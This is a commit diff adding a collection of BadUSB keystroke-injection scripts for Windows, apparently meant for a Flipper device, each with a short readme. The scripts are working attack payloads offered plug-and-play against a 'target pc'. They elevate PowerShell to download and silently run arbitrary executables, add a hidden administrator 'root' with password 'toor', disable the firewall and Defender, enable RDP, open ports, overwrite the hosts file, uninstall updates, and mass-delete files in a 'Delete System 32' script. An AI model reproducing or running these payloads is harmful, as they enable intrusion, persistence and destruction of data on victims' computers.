🤬
Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/ASCII/DownLoadAscii/ghostbuster.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Downloads the Txt file and opens it.
     3 +REM Version: 1.0
     4 +REM Category: DownloadAscii
     5 +DELAY 1000
     6 +WINDOWS d
     7 +DELAY 1500
     8 +WINDOWS r
     9 +DELAY 1500
     10 +STRING powershell Start-Process powershell -Verb runAs
     11 +ENTER
     12 +DELAY 560
     13 +LEFTARROW
     14 +DELAY 500
     15 +ENTER
     16 +DELAY 700
     17 +STRING Invoke-WebRequest -Uri https://raw.githubusercontent.com/UNC0V3R3D/ressources/main/ghostbusters.txt -OutFile C:/Windows/6565.txt; Start-Process -FilePath "C:/windows/6565.txt" -WindowStyle maximized
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/ASCII/DownLoadAscii/happyBday.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Downloads the Txt file and opens it.
     3 +REM Version: 1.0
     4 +REM Category: DownloadAscii
     5 +DELAY 1000
     6 +WINDOWS d
     7 +DELAY 1500
     8 +WINDOWS r
     9 +DELAY 1500
     10 +STRING powershell Start-Process powershell -Verb runAs
     11 +ENTER
     12 +DELAY 560
     13 +LEFTARROW
     14 +DELAY 500
     15 +ENTER
     16 +DELAY 700
     17 +STRING Invoke-WebRequest -Uri https://raw.githubusercontent.com/UNC0V3R3D/ressources/main/happyBDAY.txt -OutFile C:/Windows/6565.txt; Start-Process -FilePath "C:/windows/6565.txt" -WindowStyle maximized
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/ASCII/DownLoadAscii/indian-tech-support.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Downloads the Txt file and opens it.
     3 +REM Version: 1.0
     4 +REM Category: DownloadAscii
     5 +DELAY 1000
     6 +WINDOWS d
     7 +DELAY 1500
     8 +WINDOWS r
     9 +DELAY 1500
     10 +STRING powershell Start-Process powershell -Verb runAs
     11 +ENTER
     12 +DELAY 560
     13 +LEFTARROW
     14 +DELAY 500
     15 +ENTER
     16 +DELAY 700
     17 +STRING Invoke-WebRequest -Uri https://raw.githubusercontent.com/UNC0V3R3D/ressources/main/indian-tech-support.txt -OutFile C:/Windows/6565.txt; Start-Process -FilePath "C:/windows/6565.txt" -WindowStyle maximized
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/ASCII/DownLoadAscii/koolaid.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Downloads the Txt file and opens it.
     3 +REM Version: 1.0
     4 +REM Category: DownloadAscii
     5 +DELAY 1000
     6 +WINDOWS d
     7 +DELAY 1500
     8 +WINDOWS r
     9 +DELAY 1500
     10 +STRING powershell Start-Process powershell -Verb runAs
     11 +ENTER
     12 +DELAY 560
     13 +LEFTARROW
     14 +DELAY 500
     15 +ENTER
     16 +DELAY 700
     17 +STRING Invoke-WebRequest -Uri https://raw.githubusercontent.com/UNC0V3R3D/ressources/main/koolaid.txt -OutFile C:/Windows/6565.txt; Start-Process -FilePath "C:/windows/6565.txt" -WindowStyle maximized
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/ASCII/DownLoadAscii/memelaugh.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Downloads the Txt file and opens it.
     3 +REM Version: 1.0
     4 +REM Category: DownloadAscii
     5 +DELAY 1000
     6 +WINDOWS d
     7 +DELAY 1500
     8 +WINDOWS r
     9 +DELAY 1500
     10 +STRING powershell Start-Process powershell -Verb runAs
     11 +ENTER
     12 +DELAY 560
     13 +LEFTARROW
     14 +DELAY 500
     15 +ENTER
     16 +DELAY 700
     17 +STRING Invoke-WebRequest -Uri https://raw.githubusercontent.com/UNC0V3R3D/ressources/main/memelaugh.txt -OutFile C:/Windows/6565.txt; Start-Process -FilePath "C:/windows/6565.txt" -WindowStyle maximized
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/ASCII/DownLoadAscii/mrbean.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Downloads the Txt file and opens it.
     3 +REM Version: 1.0
     4 +REM Category: DownloadAscii
     5 +DELAY 1000
     6 +WINDOWS d
     7 +DELAY 1500
     8 +WINDOWS r
     9 +DELAY 1500
     10 +STRING powershell Start-Process powershell -Verb runAs
     11 +ENTER
     12 +DELAY 560
     13 +LEFTARROW
     14 +DELAY 500
     15 +ENTER
     16 +DELAY 700
     17 +STRING Invoke-WebRequest -Uri https://raw.githubusercontent.com/UNC0V3R3D/ressources/main/mrbean.txt -OutFile C:/Windows/6565.txt; Start-Process -FilePath "C:/windows/6565.txt" -WindowStyle maximized
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/ASCII/DownLoadAscii/mrbeanagain.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Downloads the Txt file and opens it.
     3 +REM Version: 1.0
     4 +REM Category: DownloadAscii
     5 +DELAY 1000
     6 +WINDOWS d
     7 +DELAY 1500
     8 +WINDOWS r
     9 +DELAY 1500
     10 +STRING powershell Start-Process powershell -Verb runAs
     11 +ENTER
     12 +DELAY 560
     13 +LEFTARROW
     14 +DELAY 500
     15 +ENTER
     16 +DELAY 700
     17 +STRING Invoke-WebRequest -Uri https://raw.githubusercontent.com/UNC0V3R3D/ressources/main/mrbeanagain.txt -OutFile C:/Windows/6565.txt; Start-Process -FilePath "C:/windows/6565.txt" -WindowStyle maximized
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/ASCII/DownLoadAscii/ok.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Downloads the Txt file and opens it.
     3 +REM Version: 1.0
     4 +REM Category: DownloadAscii
     5 +DELAY 1000
     6 +WINDOWS d
     7 +DELAY 1500
     8 +WINDOWS r
     9 +DELAY 1500
     10 +STRING powershell Start-Process powershell -Verb runAs
     11 +ENTER
     12 +DELAY 560
     13 +LEFTARROW
     14 +DELAY 500
     15 +ENTER
     16 +DELAY 700
     17 +STRING Invoke-WebRequest -Uri https://raw.githubusercontent.com/UNC0V3R3D/ressources/main/ok.txt -OutFile C:/Windows/6565.txt; Start-Process -FilePath "C:/windows/6565.txt" -WindowStyle maximized
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/ASCII/DownLoadAscii/pepefat.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Downloads the Txt file and opens it.
     3 +REM Version: 1.0
     4 +REM Category: DownloadAscii
     5 +DELAY 1000
     6 +WINDOWS d
     7 +DELAY 1500
     8 +WINDOWS r
     9 +DELAY 1500
     10 +STRING powershell Start-Process powershell -Verb runAs
     11 +ENTER
     12 +DELAY 560
     13 +LEFTARROW
     14 +DELAY 500
     15 +ENTER
     16 +DELAY 700
     17 +STRING Invoke-WebRequest -Uri https://raw.githubusercontent.com/UNC0V3R3D/ressources/main/pepeFAT.txt -OutFile C:/Windows/6565.txt; Start-Process -FilePath "C:/windows/6565.txt" -WindowStyle maximized
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Execution/ActivateRDP/ActivateRDP.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Activates Remote Desktop.
     3 +REM Version: 1.0
     4 +REM Category: Execution
     5 +DELAY 750
     6 +WINDOWS d
     7 +DELAY 1500
     8 +WINDOWS r
     9 +DELAY 1500
     10 +STRING powershell Start-Process powershell -Verb runAs
     11 +ENTER
     12 +DELAY 750
     13 +LEFTARROW
     14 +ENTER
     15 +DELAY 1200
     16 +ALT y
     17 +DELAY 1200
     18 +GUI UP
     19 +DELAY 1200
     20 +STRING Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' -Name fDenyTSConnections -Value 0;Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name UserAuthentication -Value 1;netsh advfirewall firewall set rule group='remote desktop - remotefx' new enable=Yes;netsh advfirewall firewall set rule group='remote desktop' new enable=Yes; exit
     21 +ENTER
     22 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Execution/ActivateRDP/readme.md
     1 +
     2 +# ActivateRDP
     3 +
     4 +This script enables Remote Desktop connections and requires RDP authentication, so it opens the necessary firewall ports to allow incoming connections.
     5 +
     6 +
     7 +
     8 +
     9 +## How to use?
     10 +
     11 +This script is easy to use. Plug the Flipper in and run the script.
     12 +
     13 +
     14 +
     15 +
     16 +## Features
     17 +
     18 +- allows remote connections
     19 +- enables RDP authentication
     20 +- allow incoming remote connections
     21 +
     22 +
     23 +
     24 +
     25 +## Feedback
     26 +
     27 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     28 +
     29 +
     30 +
     31 +
     32 +
     33 +
     34 +## Support
     35 +
     36 +For support, contact me via Discord "UNC0V3R3D#8662".
     37 +
     38 +
     39 +## Meta
     40 +
     41 +
     42 +- If you want to sponsor me on Patreon, the link is on my profile.
     43 +
     44 +
     45 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Execution/ChangeWinUsername/ChangeWinUsername.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Changes the Windows 10 username to the name of your choice.
     3 +REM Version: 1.0
     4 +REM Category: Execution
     5 +DELAY 750
     6 +WINDOWS d
     7 +DELAY 1500
     8 +WINDOWS r
     9 +DELAY 1500
     10 +STRING powershell Start-Process powershell -Verb runAs
     11 +ENTER
     12 +DELAY 560
     13 +LEFTARROW
     14 +DELAY 500
     15 +ENTER
     16 +DELAY 700
     17 +STRING $User = ([Environment]::UserName)
     18 +DELAY 300
     19 +ENTER
     20 +DELAY 500
     21 +STRING Rename-LocalUser -Name $User -NewName "New Name"
     22 +DELAY 300
     23 +ENTER
     24 +DELAY 500
     25 +exit
     26 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Execution/ChangeWinUsername/readme.md
     1 +
     2 +# ChangeWinUsername
     3 +
     4 +This script simply changes the Windows Username.
     5 +
     6 +
     7 +
     8 +
     9 +## How to use?
     10 +
     11 +This script is not plug and play. You need to replace "New Name" to any name you want right here: "STRING Rename-LocalUser -Name $User -NewName "New Name""
     12 +
     13 +
     14 +
     15 +
     16 +## Features
     17 +
     18 +- open powershell
     19 +- change windows username
     20 +
     21 +
     22 +
     23 +
     24 +## Feedback
     25 +
     26 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     27 +
     28 +
     29 +
     30 +
     31 +
     32 +
     33 +## Support
     34 +
     35 +For support, contact me via Discord "UNC0V3R3D#8662".
     36 +
     37 +
     38 +## Meta
     39 +
     40 +
     41 +- If you want to sponsor me on Patreon, the link is on my profile.
     42 +
     43 +
     44 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Execution/Create_New_Windows_Admin/Create_New_Windows_Admin.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Create a new Windows-User with Admin perms.
     3 +REM Version: 1.0
     4 +REM Category: Execution
     5 +DELAY 750
     6 +WINDOWS d
     7 +DELAY 1500
     8 +WINDOWS r
     9 +DELAY 1500
     10 +STRING powershell Start-Process powershell -Verb runAs
     11 +ENTER
     12 +DELAY 560
     13 +LEFTARROW
     14 +ENTER
     15 +DELAY 560
     16 +ALT y
     17 +DELAY 300
     18 +STRING Net User root toor /ADD;Net LocalGroup Administrators root /ADD;Net LocalGroup Administrator root /ADD;Net LocalGroup Administratoren root /ADD;reg add 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList' /v root /t REG_DWORD /d 0 /f; exit
     19 +ENTER
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Execution/Create_New_Windows_Admin/readme.md
     1 +
     2 +# Create_New_Windows_Admin
     3 +
     4 +This script creates a new windows admin user on the target pc.
     5 +
     6 +
     7 +
     8 +
     9 +## How to use?
     10 +
     11 +This script is plug and play. After the new user is created you need to use the username "root" and the password "toor" to login.
     12 +
     13 +
     14 +
     15 +
     16 +## Features
     17 +
     18 +- open powershell
     19 +- create new admin user
     20 +- create name "root"
     21 +- create password "toor"
     22 +
     23 +
     24 +
     25 +
     26 +## Feedback
     27 +
     28 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     29 +
     30 +
     31 +
     32 +
     33 +
     34 +
     35 +## Support
     36 +
     37 +For support, contact me via Discord "UNC0V3R3D#8662".
     38 +
     39 +
     40 +## Meta
     41 +
     42 +
     43 +- If you want to sponsor me on Patreon, the link is on my profile.
     44 +
     45 +
     46 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Execution/DNS_Cache_Poison/DNS_Cache_Poison.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Poisons the DNS Cache. (https://www.cloudflare.com/learning/dns/dns-cache-poisoning/)
     3 +REM Version: 1.0
     4 +REM Category: Execution
     5 +DELAY 750
     6 +WINDOWS d
     7 +DELAY 750
     8 +WINDOWS r
     9 +DELAY 800
     10 +STRING powershell Start-Process powershell -Verb runAs
     11 +ENTER
     12 +DELAY 750
     13 +LEFTARROW
     14 +ENTER
     15 +DELAY 870
     16 +ALT y
     17 +DELAY 790
     18 +STRING $redirectionAddress="IP ADRESS HERE";$redirectedSite="URL HERE";$hosts1 = $redirectionAddress + ' ' + $redirectedSite + ([Environment]::NewLine);$hosts2 = $redirectionAddress + ' www.' + $redirectedSite;$hoststotal = $hosts1 + $hosts2;[io.file]::writealltext("C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS", $hoststotal); exit
     19 +ENTER
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Execution/DNS_Cache_Poison/readme.md
     1 +
     2 +# DNS_Cache_Poison
     3 +
     4 +This script modifies the "hosts" file on a Windows operating system. You can change ip adresses of resolved domain names to open facebook.com instead of google.com when you search it for example.
     5 +
     6 +
     7 +
     8 +## How to use?
     9 +
     10 +This script is not plug and play. You will have to do the following changes:
     11 +
     12 +- change rediraction adress "$redirectionAddress="IP ADRESS HERE""
     13 +- change rediraction url "$redirectedSite="URL HERE""
     14 +
     15 +
     16 +
     17 +
     18 +## Features
     19 +
     20 +- open powershell
     21 +- change content of "hosts" file
     22 +
     23 +
     24 +
     25 +
     26 +
     27 +## Feedback
     28 +
     29 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     30 +
     31 +
     32 +
     33 +
     34 +
     35 +
     36 +## Support
     37 +
     38 +For support, contact me via Discord "UNC0V3R3D#8662".
     39 +
     40 +
     41 +## Meta
     42 +
     43 +
     44 +- If you want to sponsor me on Patreon, the link is on my profile.
     45 +
     46 +
     47 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Execution/Delete_System_32/Delete_System_32.txt
     1 +REM Author: FalsePhilosopher
     2 +REM Description: Deletes System 32...
     3 +REM Version: 1.0
     4 +REM Category: Execution
     5 +DELAY 750
     6 +GUI r
     7 +DELAY 600
     8 +STRING cmd
     9 +CTRL-SHIFT ENTER
     10 +DELAY 1500
     11 +ALT y
     12 +DELAY 800
     13 +STRING takeown /f * /r /a /d y && icacls * /inheritance:r /grant:r administrators:(F) /t & del /f /q *
     14 +ENTER
     15 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Execution/Delete_System_32/readme.md
     1 +
     2 +# Delete_System_32
     3 +
     4 +This script deletes the system 32 folder. Be careful!
     5 +
     6 +
     7 +
     8 +
     9 +## How to use?
     10 +
     11 +This script is plug and play. I am not responsible for any damage.
     12 +
     13 +
     14 +
     15 +
     16 +## Features
     17 +
     18 +- open powershell
     19 +- delete system 32
     20 +
     21 +
     22 +
     23 +
     24 +
     25 +## Feedback
     26 +
     27 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     28 +
     29 +
     30 +
     31 +
     32 +
     33 +
     34 +## Support
     35 +
     36 +For support, contact me via Discord "UNC0V3R3D#8662".
     37 +
     38 +
     39 +## Meta
     40 +
     41 +
     42 +- If you want to sponsor me on Patreon, the link is on my profile.
     43 +
     44 +
     45 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Execution/DisableFirewall/DisableFirewall.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Disables the Windows-Firewall.
     3 +REM Version: 1.0
     4 +REM Category: Execution
     5 +DELAY 750
     6 +WINDOWS d
     7 +DELAY 850
     8 +WINDOWS r
     9 +DELAY 900
     10 +STRING powershell Start-Process powershell -Verb runAs
     11 +ENTER
     12 +DELAY 750
     13 +LEFTARROW
     14 +ENTER
     15 +DELAY 900
     16 +ALT y
     17 +DELAY 900
     18 +STRING netsh advfirewall set allprofiles state off; exit
     19 +ENTER
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Execution/DisableFirewall/readme.md
     1 +
     2 +# DisableFirewall
     3 +
     4 +This script disables the windows firewall.
     5 +
     6 +
     7 +
     8 +## How to use?
     9 +
     10 +This script is plug and play. Just plug the Flipper in and run the script.
     11 +
     12 +
     13 +
     14 +
     15 +## Features
     16 +
     17 +- open powershell
     18 +- disable windows firewall
     19 +
     20 +
     21 +
     22 +
     23 +
     24 +## Feedback
     25 +
     26 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     27 +
     28 +
     29 +
     30 +
     31 +
     32 +
     33 +## Support
     34 +
     35 +For support, contact me via Discord "UNC0V3R3D#8662".
     36 +
     37 +
     38 +## Meta
     39 +
     40 +
     41 +- If you want to sponsor me on Patreon, the link is on my profile.
     42 +
     43 +
     44 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Execution/Disable_WinDefender/Disable_WinDefender.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Disables Windows Defender.
     3 +REM Version: 1.0
     4 +REM Category: Execution
     5 +DELAY 1500
     6 +CTRL ESC
     7 +DELAY 750
     8 +STRING windows security
     9 +DELAY 250
     10 +ENTER
     11 +DELAY 1000
     12 +ENTER
     13 +DELAY 500
     14 +TAB
     15 +DELAY 100
     16 +TAB
     17 +DELAY 100
     18 +TAB
     19 +DELAY 100
     20 +TAB
     21 +DELAY 100
     22 +ENTER
     23 +DELAY 500
     24 +SPACE
     25 +DELAY 1000
     26 +ALT y
     27 +DELAY 1000
     28 +ALT F4
     29 +DELAY 500
     30 +GUI r
     31 +DELAY 500
     32 +STRING powershell
     33 +CTRL-SHIFT ENTER
     34 +DELAY 1000
     35 +ALT y
     36 +DELAY 1000
     37 +STRING Add-MpPreference -ExclusionPath “C:”
     38 +ENTER
     39 +DELAY 2000
     40 +STRING EXIT
     41 +ENTER
     42 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Execution/Disable_WinDefender/readme.md
     1 +
     2 +# Disable_WinDefender
     3 +
     4 +This script disables the windows defender until the pc is restarted.
     5 +
     6 +
     7 +
     8 +## How to use?
     9 +
     10 +This script is plug and play.
     11 +
     12 +
     13 +
     14 +
     15 +## Features
     16 +
     17 +- open powershell
     18 +- disable windows defender
     19 +
     20 +
     21 +
     22 +
     23 +
     24 +## Feedback
     25 +
     26 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     27 +
     28 +
     29 +
     30 +
     31 +
     32 +
     33 +## Support
     34 +
     35 +For support, contact me via Discord "UNC0V3R3D#8662".
     36 +
     37 +
     38 +## Meta
     39 +
     40 +
     41 +- If you want to sponsor me on Patreon, the link is on my profile.
     42 +
     43 +
     44 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Execution/DownloadAnyEXE/DownloadAnyEXE.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Downloads an .exe file from the URL and runs it on the target pc.
     3 +REM Version: 1.0
     4 +REM Category: Execution
     5 +DELAY 750
     6 +WINDOWS d
     7 +DELAY 950
     8 +WINDOWS r
     9 +DELAY 650
     10 +STRING powershell Start-Process powershell -Verb runAs
     11 +ENTER
     12 +DELAY 750
     13 +LEFTARROW
     14 +ENTER
     15 +DELAY 850
     16 +ALT y
     17 +DELAY 1200
     18 +STRING $url = "URL TO EXE"; $output = "C:\windows\41281687.exe"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath "C:\windows\41281687.exe"; exit
     19 +ENTER
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Execution/DownloadAnyEXE/readme.md
     1 +
     2 +# DownloadAnyEXE
     3 +
     4 +This script downloads an exe from an url that you will have to provide, then it executes the exe file.
     5 +
     6 +
     7 +
     8 +## How to use?
     9 +
     10 +This script is not plug and play. You will have to do the following changes:
     11 +
     12 +- change url for the .exe file "$url = "URL TO EXE""
     13 +
     14 +
     15 +
     16 +## Features
     17 +
     18 +- open powershell
     19 +- download .exe from url
     20 +- execute downloaded .exe
     21 +
     22 +
     23 +
     24 +
     25 +
     26 +## Feedback
     27 +
     28 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     29 +
     30 +
     31 +
     32 +
     33 +
     34 +
     35 +## Support
     36 +
     37 +For support, contact me via Discord "UNC0V3R3D#8662".
     38 +
     39 +
     40 +## Meta
     41 +
     42 +
     43 +- If you want to sponsor me on Patreon, the link is on my profile.
     44 +
     45 +
     46 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Execution/Invisible_DownExec/Invisible_DownExec.txt
     1 +REM Author: hell0
     2 +REM Description: Downloads an .exe file from the URL and runs it on the target pc.
     3 +REM Version: 1.0
     4 +REM Category: Execution
     5 +REM Target: All Windows
     6 +DELAY 500
     7 +GUI d
     8 +DELAY 500
     9 +GUI r
     10 +DELAY 500
     11 +STRING powershell.exe
     12 +ENTER
     13 +DELAY 2000
     14 +STRING Start-Process -FilePath "powershell" -ArgumentList "/c cd $Env:temp;Invoke-WebRequest -Uri 'https://yoursite.com/your_executable.exe' -OutFile 'your_executable.exe'; Start-Process -FilePath '.\your_executable.exe'; exit" -WindowStyle Hidden; exit
     15 +ENTER
     16 +DELAY 500
     17 +GUI d
     18 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Execution/Invisible_DownExec/readme.md
     1 +
     2 +# Invisible_DownExec
     3 +
     4 +This script invisibly downloads an exe from an url that you will have to provide, then it executes the exe file.
     5 +
     6 +
     7 +
     8 +## How to use?
     9 +
     10 +This script is not plug and play. You will have to do the following changes:
     11 +
     12 +- change url for the .exe file "-Uri 'https://yoursite.com/your_executable.exe'"
     13 +- change name of the .exe file "-OutFile 'your_executable.exe'"
     14 +
     15 +
     16 +## Features
     17 +
     18 +- open powershell invisble
     19 +- download .exe from url
     20 +- execute downloaded .exe
     21 +
     22 +
     23 +
     24 +
     25 +
     26 +## Feedback
     27 +
     28 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     29 +
     30 +
     31 +
     32 +
     33 +
     34 +
     35 +## Support
     36 +
     37 +For support, contact me via Discord "UNC0V3R3D#8662".
     38 +
     39 +
     40 +## Meta
     41 +
     42 +
     43 +- If you want to sponsor me on Patreon, the link is on my profile.
     44 +
     45 +
     46 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Execution/Invisible_DownExec_Zip_Extract/Invisible_DownExec_Zip_Extract.txt
     1 +REM Author: hell0
     2 +REM Description: Downloads an .zip file from the URL, extract and runs it on the target pc.
     3 +REM Version: 1.0
     4 +REM Category: Execution
     5 +REM Target: All Windows
     6 +DELAY 500
     7 +GUI d
     8 +DELAY 500
     9 +GUI r
     10 +DELAY 500
     11 +STRING powershell.exe
     12 +ENTER
     13 +DELAY 2000
     14 +STRING Start-Process -FilePath "powershell" -ArgumentList "/c cd $Env:temp;Invoke-WebRequest -Uri 'https://yoursite.com/zipfile.jpg' -OutFile 'zipfile.zip'; Expand-Archive zipfile.zip; Start-Process -FilePath '.\zipfile\your_executable.exe'; exit" -WindowStyle Hidden; exit
     15 +ENTER
     16 +DELAY 500
     17 +GUI d
     18 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Execution/Invisible_DownExec_Zip_Extract/readme.md
     1 +
     2 +# Invisible_DownExec_Zip_Extract
     3 +
     4 +This script invisibly downloads an .zip file from the URL, extracts and runs it on the target pc.
     5 +
     6 +
     7 +
     8 +## How to use?
     9 +
     10 +This script is not plug and play. You will have to do the following changes:
     11 +
     12 +- change url for the .zip file "-Uri 'https://yoursite.com/zipfile.jpg'"
     13 +- change name of the .zip file "-OutFile 'zipfile.zip'"
     14 +- change path of the .exe in the extracted folder "-FilePath '.\zipfile\your_executable.exe'"
     15 +
     16 +
     17 +## Features
     18 +
     19 +- open powershell invisble
     20 +- download .zip from url
     21 +- extract .zip file
     22 +- run exe from .zip file
     23 +
     24 +
     25 +
     26 +
     27 +
     28 +## Feedback
     29 +
     30 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     31 +
     32 +
     33 +
     34 +
     35 +
     36 +
     37 +## Support
     38 +
     39 +For support, contact me via Discord "UNC0V3R3D#8662".
     40 +
     41 +
     42 +## Meta
     43 +
     44 +
     45 +- If you want to sponsor me on Patreon, the link is on my profile.
     46 +
     47 +
     48 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Execution/OpenAnyPort/OpenAnyPort.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Open any TCP or UDP Port on the target PC.
     3 +REM Version: 1.0
     4 +REM Category: Execution
     5 +DELAY 750
     6 +WINDOWS d
     7 +DELAY 850
     8 +WINDOWS r
     9 +DELAY 850
     10 +STRING powershell Start-Process powershell -Verb runAs
     11 +ENTER
     12 +DELAY 800
     13 +LEFTARROW
     14 +ENTER
     15 +DELAY 900
     16 +ALT y
     17 +DELAY 900
     18 +STRING netsh advfirewall firewall add rule name=Firewall entry name dir=in action=allow protocol=TCP or UDP localport=Port Number; exit
     19 +ENTER
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Execution/OpenAnyPort/readme.md
     1 +
     2 +# OpenAnyPort
     3 +
     4 +This script adds a firewall rule to the Windows Advanced Firewall that allows incoming traffic over TCP or UDP on a specific port number.
     5 +
     6 +
     7 +
     8 +## How to use?
     9 +
     10 +This script is not plug and play. You will have to do the following changes:
     11 +
     12 +- choose protocol "protocol=TCP or UDP"
     13 +- change localport "localport=Port Number"
     14 +- choose entry name "name=Firewall entry name"
     15 +
     16 +
     17 +## Features
     18 +
     19 +- open powershell
     20 +- create new entry
     21 +- allow port to receive traffic
     22 +
     23 +
     24 +
     25 +
     26 +
     27 +## Feedback
     28 +
     29 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     30 +
     31 +
     32 +
     33 +
     34 +
     35 +
     36 +## Support
     37 +
     38 +For support, contact me via Discord "UNC0V3R3D#8662".
     39 +
     40 +
     41 +## Meta
     42 +
     43 +
     44 +- If you want to sponsor me on Patreon, the link is on my profile.
     45 +
     46 +
     47 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Execution/RemoveWindowsUpdate/RemoveWindowsUpdate.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Remove any Windows Update. Please put in the update number you want to remove. Example: KB27475
     3 +REM Version: 1.0
     4 +REM Category: Execution
     5 +DELAY 750
     6 +WINDOWS d
     7 +DELAY 1500
     8 +WINDOWS r
     9 +DELAY 1500
     10 +STRING powershell Start-Process powershell -Verb runAs
     11 +ENTER
     12 +DELAY 750
     13 +LEFTARROW
     14 +ENTER
     15 +DELAY 1500
     16 +ALT y
     17 +DELAY 1500
     18 +GUI UP
     19 +DELAY 1500
     20 +STRING $input="UPDATE NUMBER";$input = $input.Replace('KB', '');$cmdString = 'wusa /quiet /norestart /uninstall /kb:' + $input;Invoke-Expression -Command $cmdString; exit
     21 +ENTER
     22 + 
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Windows_Badusb/Execution/RemoveWindowsUpdate/readme.md
     1 +
     2 +# RemoveWindowsUpdate
     3 +
     4 +This script uninstalls a Windows update that has been previously installed on the system.
     5 +
     6 +
     7 +
     8 +## How to use?
     9 +
     10 +This script is not plug and play. You will have to do the following changes:
     11 +
     12 +- change update number "$input="UPDATE NUMBER""
     13 +
     14 +
     15 +## Features
     16 +
     17 +- open powershell
     18 +- find update by number
     19 +- uninstall update
     20 +
     21 +
     22 +
     23 +
     24 +
     25 +## Feedback
     26 +
     27 +If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
     28 +
     29 +
     30 +
     31 +
     32 +
     33 +
     34 +## Support
     35 +
     36 +For support, contact me via Discord "UNC0V3R3D#8662".
     37 +
     38 +
